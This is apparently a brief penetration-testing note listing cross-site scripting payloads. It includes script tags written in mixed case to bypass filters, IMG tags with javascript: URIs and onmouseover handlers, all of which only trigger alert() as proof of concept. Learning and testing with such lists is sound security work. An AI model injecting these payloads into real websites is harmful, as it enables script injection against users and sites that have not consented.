Last updated 2 years ago
This is a good list:
<script>alert(1)</script>
Imagine that the server sanitizes <script>. To bypass that we can use: <SCrIpt>alert(2)</ScRiPt> <script type=text/javascript>alert(2)</script>
<script>
<SCrIpt>alert(2)</ScRiPt>
<script type=text/javascript>alert(2)</script>
<IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG onmouseover="alert('xxs')">
<a onmouseover="alert(2)">d</a>